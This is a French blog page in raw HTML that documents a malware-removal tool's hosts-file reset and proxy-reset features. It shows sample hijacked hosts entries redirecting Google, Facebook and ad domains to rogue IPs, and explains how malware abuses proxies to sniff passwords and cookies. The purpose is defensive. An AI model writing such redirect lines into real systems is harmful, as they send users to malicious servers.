&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-MzQvUWdTE_8/UIpYRY2d6aI/AAAAAAAAAQY/hLtkzLLL3E8/s1600/delete.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="480" src="http://4.bp.blogspot.com/-MzQvUWdTE_8/UIpYRY2d6aI/AAAAAAAAAQY/hLtkzLLL3E8/s640/delete.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Déclenchement de la suppression &lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;HOST RAZ&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;L&lt;span style="font-size: small;"&gt;e &lt;a href="http://fr.wikipedia.org/wiki/Hosts"&gt;fichier Hosts&lt;/a&gt; est un fichier de configuration Windows, permettant d'e&lt;span style="font-size: small;"&gt;ffect&lt;span style="font-size: small;"&gt;uer des redirections de noms de domain&lt;span style="font-size: small;"&gt;es vers &lt;span style="font-size: small;"&gt;des IPs définies. On l'utilise principalement pour interdire l'accès à une ad&lt;span style="font-size: small;"&gt;resse internet, ou pour &lt;span style="font-size: small;"&gt;associer une adresse textuelle (ex: &lt;b&gt;http://test.com&lt;/b&gt;) vers une adresse IP du réseau loca&lt;span style="font-size: small;"&gt;l (ex: &lt;b&gt;192.168.1.&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;12&lt;/b&gt;). Voici quelques exemples de redirections Hosts légitimes:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: #351c75;"&gt;127.0.0.1 localhost &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;(ligne par defaut dans le fichier hosts)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&lt;i&gt;127.0.0.1 &lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&lt;i&gt;www.&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&lt;i&gt;site_de_virus.com&lt;/i&gt;&lt;/span&gt;&lt;/b&gt; (empêche&lt;span style="font-size: small;"&gt; l'accès a des sites dangereux)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&lt;i&gt;192.168.1.12 &lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;mon_site_en_local&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt; (&lt;span style="font-size: small;"&gt;associe un&lt;span style="font-size: small;"&gt;e adresse textuelle à une IP du réseau local&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Les &lt;span style="font-size: small;"&gt;malwares &lt;span style="font-size: small;"&gt;peuvent utiliser le fichier Hosts pour &lt;b&gt;rediriger des adresses web légitimes ve&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;rs des se&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;rveurs vérolés&lt;/b&gt;, et ainsi infecter de nouveaux utilisateurs.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; Voici un exemple de lignes malware&lt;span style="font-size: small;"&gt;s&lt;span style="font-size: small;"&gt;:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: #351c75;"&gt;&lt;span style="color: #cc0000;"&gt;123.456.789.10 &lt;span style="font-size: small;"&gt;www.google.com&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;(&lt;span style="font-size: small;"&gt;redirige un site bien connu vers u&lt;span style="font-size: small;"&gt;ne ad&lt;span style="font-size: small;"&gt;resse IP inconnue - le serveur &lt;span style="font-size: small;"&gt;vérolé&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;)&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: #351c75;"&gt;&lt;span style="color: #cc0000;"&gt;165.498.156.14 &lt;span style="font-size: small;"&gt;www.facebook.com&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;(&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;redirige un site bien connu vers u&lt;span style="font-size: small;"&gt;ne ad&lt;span style="font-size: small;"&gt;resse IP &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;inconnue &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;- le serveur &lt;span style="font-size: small;"&gt;vérolé&lt;/span&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;Ces lignes doivent être supprimées&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;.&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;L&lt;span style="font-size: small;"&gt;e contenu du fichier Hosts de Windows est visible après un &lt;i&gt;&lt;b&gt;Scan &lt;/b&gt;&lt;/i&gt;dans l&lt;span style="font-size: small;"&gt;'onglet &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;i&gt;&lt;b&gt;Hosts&lt;/b&gt;&lt;/i&gt;, ou dans la section du m&lt;span style="font-size: small;"&gt;ême nom dans le rapport&lt;/span&gt;. Le bouton &lt;i&gt;&lt;b&gt;Host RAZ&lt;/b&gt;&lt;/i&gt; permet de &lt;b&gt;réinitialiser le contenu du f&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;ichier hosts&lt;/b&gt; avec la ligne par défaut présente à l'installation de Windows, à savoir : &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="color: #351c75;"&gt;127.0.0.1 localhost&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; &lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Une fois l&lt;span style="font-size: small;"&gt;a réinitialisation terminé, &lt;b&gt;un rapport texte est disponible&lt;/b&gt;&lt;span style="font-size: small;"&gt; en cliquant sur le bouton &lt;i&gt;&lt;b&gt;Rapport. &lt;/b&gt;&lt;/i&gt;Ce dernier est a&lt;span style="font-size: small;"&gt;ussi sur le bureau (RKReport[#]&lt;span style="font-size: small;"&gt;.txt).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Voici un exemple de section Hosts vérolée: &lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ Fichier HOSTS: ¤¤¤&lt;br /&gt;
--&amp;gt; C:\Windows\system32\drivers\&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;etc\hosts&lt;br /&gt;&lt;br /&gt;
127.0.0.1 &amp;nbsp; &amp;nbsp; &amp;nbsp; localhost&lt;/span&gt;
&lt;span style="color: #0b5394;"&gt;&lt;br /&gt;
::1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; localhost&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;64.46.36.178 www.google-analytics.com.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;
64.46.36.178 ad-emea.doubleclick.net.&lt;br /&gt;
64.46.36.178 www.statcounter.com.&lt;br /&gt;
64.27.10.42 www.google-analytics.com.&lt;br /&gt;
64.27.10.42 ad-emea.doubleclick.net.&lt;br /&gt;
64.27.10.42 www.statcounter.com.&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Après passage du &lt;i&gt;&lt;b&gt;Hosts RAZ&lt;/b&gt;&lt;/i&gt;, le contenu du rapport est le suivant:&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ Fichier HOSTS: ¤¤¤&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;
--&amp;gt; C:\Windows\system32\drivers\&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span style="color: #0b5394;"&gt;etc\hosts&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;
127.0.0.1 &amp;nbsp; &amp;nbsp; &amp;nbsp; localhost&lt;/span&gt;
&lt;/div&gt;
&lt;span style="color: #0b5394;"&gt;
::1 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; localhost&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/--lMrUv9A_2Y/UIpYToFN8sI/AAAAAAAAAQk/5K0L09akMfs/s1600/hosts.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="481" src="http://4.bp.blogspot.com/--lMrUv9A_2Y/UIpYToFN8sI/AAAAAAAAAQk/5K0L09akMfs/s640/hosts.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Déclenchement de la réinitialisation du fichier Hosts &lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;PROXY RAZ&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;L&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;a &lt;a href="http://fr.wikipedia.org/wiki/Mandataire_%28informatique%29"&gt;configuration proxy&lt;/a&gt;&lt;/span&gt; est une &lt;b&gt;configuration particulière d'accès au web&lt;/b&gt;, permettant &lt;span style="font-size: small;"&gt;de &lt;b&gt;rediriger le flux &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;internet entrant&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; et sortant vers une ad&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;resse IP&lt;/b&gt; e&lt;span style="font-size: small;"&gt;t un port particulie&lt;span style="font-size: small;"&gt;r. Cela est surtout utilisé lorsqu&lt;span style="font-size: small;"&gt;e dans un&lt;span style="font-size: small;"&gt;e entreprise &lt;b&gt;un accès internet est filtré par un serveur du réseau&lt;/b&gt;&lt;span style="font-size: small;"&gt; (l'adresse du proxy est alors une IP du réseau local), ou lorsqu'on veut &lt;b&gt;filtrer le traffic internet par un logiciel installé en local&lt;/b&gt; (l&lt;span style="font-size: small;"&gt;'adresse d&lt;span style="font-size: small;"&gt;u proxy est alors &lt;span style="font-size: small;"&gt;celle du localhost&lt;span style="font-size: small;"&gt; - 127.0.0.1&lt;span style="font-size: small;"&gt; sur un port particulier)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Un malware peut également modifier la configuration proxy pour filtrer les accès au web&lt;/b&gt;, et ainsi:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Se protéger&lt;/b&gt; du téléchargement de logiciels antivirus (en bloquant les pages web associées).&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Sniffer le traffic&lt;/b&gt; internet (et récupérer les mot de passes éventuels, les cookies de session, ...).&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Rediriger l'utilisateur&lt;/b&gt; vers des sites vérolés, ou sur des publicités.&lt;/li&gt;
&lt;li&gt;...&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
Voici un exemple de configuration proxy. Il est difficile sans connaitre l'architecture réseau de la personne concernée de savoir si ce dernier est légitime ou non. &lt;b&gt;En général, seul l'utilisateur sait s'il doit utiliser ou non un proxy&lt;/b&gt;.&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;table border="1" cellpadding="5" cellspacing="1" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;div style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;¤¤¤ Entrees de registre: 3 ¤¤¤&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;[PROXY IE] HKCU\[...]\Internet Settings : ProxyEnable (1) -&amp;gt; FOUND&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;[PROXY IE] HKCU\[...]\Internet Settings : ProxyServer (10.25.52.205:8080) -&amp;gt; FOUND&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #0b5394;"&gt;[PROXY FF] n2aqvo03.default\ 10.25.52.205:8080 -&amp;gt; FOUND&lt;/span&gt; 
&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
Les lignes précédentes montrent une configuration Proxy à la fois pour &lt;b&gt;Internet Explorer&lt;/b&gt; (paramètres proxy du système) et pour &lt;b&gt;Mozilla Firefox&lt;/b&gt;.&lt;br /&gt;
